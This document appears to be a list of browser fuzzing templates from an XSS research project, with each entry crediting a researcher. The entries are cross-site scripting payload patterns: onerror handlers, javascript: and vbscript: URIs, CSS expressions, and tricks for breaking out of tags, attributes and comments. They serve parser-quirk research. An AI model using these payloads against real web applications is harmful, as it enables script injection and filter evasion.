Characters between rgb <div id="fuzzelement*num*" style="color:r*chr*gb(0,0,0);"></div> @garethheyes
Characters before rgb <div id="fuzzelement*num*" style="color:*chr*rgb(0,0,0);"></div> @garethheyes
Characters allowed before paren <div id="fuzzelement*num*" style="color:rgb*chr*(0,0,0);"></div> @garethheyes
Characters allowed after paren rule <div id="fuzzelement*num*" style="color:rgb(0,0,0)*chr*junk;"></div> @garethheyes
Valid characters after expression 4 <div style="xss:expression(logChr(*num*))\*hex2* junk"></div> @garethheyes
Valid characters after expression 3 <div style="xss:expression(logChr(*num*))'*chr*junk"></div> @garethheyes
Valid characters after expression 2 <div style="xss:expression(logChr(*num*))*chr**chr*junk"></div> @garethheyes
Valid characters after expression <div style="xss:expression(logChr(*num*))*chr*junk"></div> @garethheyes
Opening paren expression check <div style="xss:expression(logChr*chr**num*))">test</div> @garethheyes
Characters that trigger a new attr after new line <img src=1 title= x:xx*chr*/onerror=logChr(*num*)> @garethheyes
Characters eating backslash in javascript string 2 <script>if("x\*chr*".length==2) { log(*num*);}</script> @mhswende
Characters eating backslash in javascript string <script>if("x\*chr*".length==1) { log(*num*);}</script> @mhswende
Quoteless attributes breaker <img src=xxx:xxx title=1*chr*/onerror=logChr(*num*)> @garethheyes
Characters ignored inside javascript string v2 <script>if("x*chr*x" == "xx") { log(*num*);}</script> @mhswende
Characters ignored in html event handler name <img src=x on*chr*Error="javascript:log(*num*)"/> @mhswende
Characters ignored in Javascript function call "`'><script>lo*chr*g(*num*)</script> @mhswende
Replacement for greater than sign *chr*script>log(*num*)</script> @mhswende
Characters allowed between tag and attribute <script*chr*type="text/javascript">log(*num*);</script> @0xAli
Characters which break attributes without quotes <b id="id*num*" x=begin*chr*end >`'"></b><script>if (!/begin.end/.test(document.getElementById('id*num*').getAttribute('x'))) { log(*num*);}</script> @shafigullin
Single quote break <script charset='*chr*>log(*num*)</script> @0xAli
Characters that close a quote <script charset="*chr*>log(*num*)</script> @0xAli
Unicode sequences generating illegitimate ASCII <script> "\ud83d\u*hex4*".match(/.*<.*/) ? log(*num*) : null; </script> @0x6D6172696F
Characters allowed after ampersand in named character references <a href="javascript&*chr*colon;log(*num*)" id="fuzzelement*num*">test</a> @_cweb
Characters ending HTML closing tags (HTML4) <style></style*chr*<img src="about:blank" onerror=log(*num*)//></style> @0x6D6172696F
Characters consuming backslashes and breaking JS strings <script>a='abc\*chr*\';log(*num*)//def';</script> @0x6D6172696F
Events in tags with src or href that execute javascript <*datahtmlelements* data=about:blank background=about:blank action=about:blank type=image/gif src=about:blank href=about:blank *dataevents*="customLog('*datahtmlelements* *dataevents*')"></*datahtmlelements*> @garethheyes
Tags and events that execute javascript 2 <*datahtmlelements* *dataevents*="javascript:parent.customLog('*datahtmlelements* *dataevents*')"></*datahtmlelements*> @garethheyes
Tags and events that execute javascript <*datahtmlelements* *datahtmlattributes*="javascript:parent.customLog('*datahtmlelements* *datahtmlattributes*')"></*datahtmlelements*> @garethheyes
Tags that execute onerror <*datahtmlelements* src=1 href=1 onerror="customLog('*datahtmlelements*')"></*datahtmlelements*> @garethheyes
Does this browser support e4x <script>try{eval("<></>");logBoolean(1)}catch(e){logBoolean(0)};</script> @garethheyes
Characters to separate class names in class attributes <div class="foo*num**chr*bar">HELLO</div> <script>document.getElementsByClassName('foo*num*')[0]?log(*num*):0</script> @0x6D6172696F
Characters allowed after uri host "`'/><img/onload=log(*num*) src="http://shazzer.co.uk*chr*/favicon.ico"/> @jackmasa
Determine what character can replace in end tags <script>log(*num*)<*chr*script> @MisterJyu
Characters that close a HTML comment 002 <!--*chr*<img src=xxx:x onerror=log(*num*)> --> @0x6D6172696F
Characters that close HTML tags <script>log(*num*)</script*chr* @0x6D6172696F
Characters not encoded by encodeURIComponent <script> if ('*uni*' === encodeURIComponent('*uni*')) { log(*num*); } </script> @shafigullin
Characters not encoded by encodeURI <script> if ('*uni*' === encodeURI('*uni*')) { log(*num*); } </script> @shafigullin
Characters allowed after script <script*chr*>log(*num*)</script> @garethheyes
Single character breaking innerHTML copy <div id="fuzzelement*num*"> <div title="*chr*style=color:#FF1133;" id="copyTarget*num*">*num* - test</div> </div> @thewildcat
Entity character breaking innerHTML copy <div id="fuzzelement*num*"> <div title="&#x*hex6*;style=color:#FF1133" id="copyTarget*num*">*num* - test</div> </div> @thewildcat
determine what characters can be inside a script tag "`'><sc*chr*ript>log(*num*)</sc*chr*ript> @MisterJyu
Characters allowed attribute quote "/><img/onerror=*chr*log(*num*)*chr*src=xxx:x /> @jackmasa
determine any chars can go between the onerror attributes <img src="x"*chr**chr*o*chr*n*chr*error="alert(*num*)"> @MisterJyu
Replacement for greater and less than signs (revised) *chr*script*chr* log(*num*) *chr**chr*script*chr @MisterJyu
Replacement for greater and less than signs *chr*script*chr alert(1) *chr**chr*script*chr @MisterJyu
Characters syntactically equivalent to single quote in HTML attributes `"'><img src='#*chr* onerror=log(*num*)> @_cweb
Characters syntactically equivalent to colon in a URI <a href="javascript*chr*alert(1)" id="fuzzelement*num*">test</a> @_cweb
Characters breaking innerHTML copy <div id="fuzzelement*num*"> <div title="*chr**chr*style=color:#FF1133" id="copyTarget*num*">*num* - test</div> </div> @thewildcat
Characters escaping JS comment delimiters 001 <script>/* **chr*/log(*num*)// */</script> @0x6D6172696F
Characters breaking CSS strings allowing expression "'`>ABC<div style="font-family:'foo*chr*;x:expression(log(*num*));/*';">DEF @0x6D6172696F
Characters ending CSS values allowing expressions "'`>ABC<div style="font-family:'foo'*chr*x:expression(log(*num*));/*';">DEF @0x6D6172696F
Characters breaking JavaScript Regex delimiter "'`><script>a=/hello;*chr*;i=0;log(*num*);a/i;</script> @0x6D6172696F
Escape from attribute a closing tag <a href="*chr*><script>log(*num*)</script>" /> @shafigullin
Characters in script inside XML elements 004 "'`><p><svg><script>a='hello*chr*;log(*num*)//';</script></p> @0x6D6172696F
Characters in script inside XML elements 003 <p><svg><script>*chr*og(*num*)</script></p> @0x6D6172696F
Characters in script inside XML elements 002 <p><svg><script>l*chr*og(*num*)</script></p> @0x6D6172696F
Characters in script inside XML elements 001 <p><svg><script>*chr*log(*num*)</script></p> @0x6D6172696F
Space characters in RegExp <script> if ('*chr*'.replace(/\s/g, '') === '') { log(*num*); } </script> @shafigullin
Character between lt and slash in closing tag <script>log(*num*)<*chr*/script> @shafigullin
Characters allowed for padding in a VBS URI 002 <iframe src="vbscript:log*chr**num*"></iframe> @0x6D6172696F
Characters allowed for padding in a VBS URI 001 <iframe src="vbs:log*chr**num*"></iframe> @0x6D6172696F
Characters allowed between CSS expression chars 02 ABC<div style="x:expression*chr*(log(*num*))">DEF @0x6D6172696F
Characters allowed between CSS expression chars 01 ABC<div style="x:exp*chr*ression(log(*num*))">DEF @0x6D6172696F
Characters allowed between CSS colon and expression ABC<div style="x:*chr*expression(log(*num*))">DEF @0x6D6172696F
Characters allowed between CSS prop and expression ABC<div style="x*chr*expression(log(*num*))">DEF @0x6D6172696F
Characters allowed for padding in a data URI 003 <script src="data:text/plain*chr*log(*num*)"></script> @0x6D6172696F
Characters allowed for padding in a data URI 002 <script src="data:*chr*,log(*num*)"></script> @0x6D6172696F
Characters allowed for padding in a data URI 001 <script src="data:text/plain,lo*chr*g(*num*)"></script> @0x6D6172696F
Characters trimmed by trim <script> if ('*chr*'.trim() === '') { log(*num*); } </script> @shafigullin
Characters before paren in Javascript call "'`><script>log*chr*(*num*)</script> @garethheyes
Characters before img "'`><*chr*img src=xxx:x onerror=log(*num*)> @garethheyes
Characters before script '`"><*chr*script>log(*num*)</script> @garethheyes
Characters in between protocol in js url <a href="javas*chr*cript:alert(1)" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed after attribute name `"'><img src=xxx:x onerror*chr*=log(*num*)> @garethheyes
Characters that close JS Comments '"`><script>/* **chr*log(*num*)// */</script> @garethheyes
Characters allowed before protocol in js url <a href="*chr*javascript:alert(1)" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed before colon in js url <a href="javascript*chr*:alert(1)" id="fuzzelement*num*">test</a> @garethheyes
NULL Characters inside JavaScript properties `'"><script>window['log*chr*'](*num*)</script> @garethheyes
Characters allowed before CSS properties '"`><div id="fuzzelement*num*" style="*chr*color:#000000;"></div> @garethheyes
Characters allowed before a JavaScript function "`'><script>*chr*log(*num*)</script> @garethheyes
Characters that close a HTML comment --><!-- --*chr*> <img src=xxx:x onerror=log(*num*)> --> @garethheyes
Characters allowed before attribute name `"'><img src=xxx:x *chr*onerror=log(*num*)> @garethheyes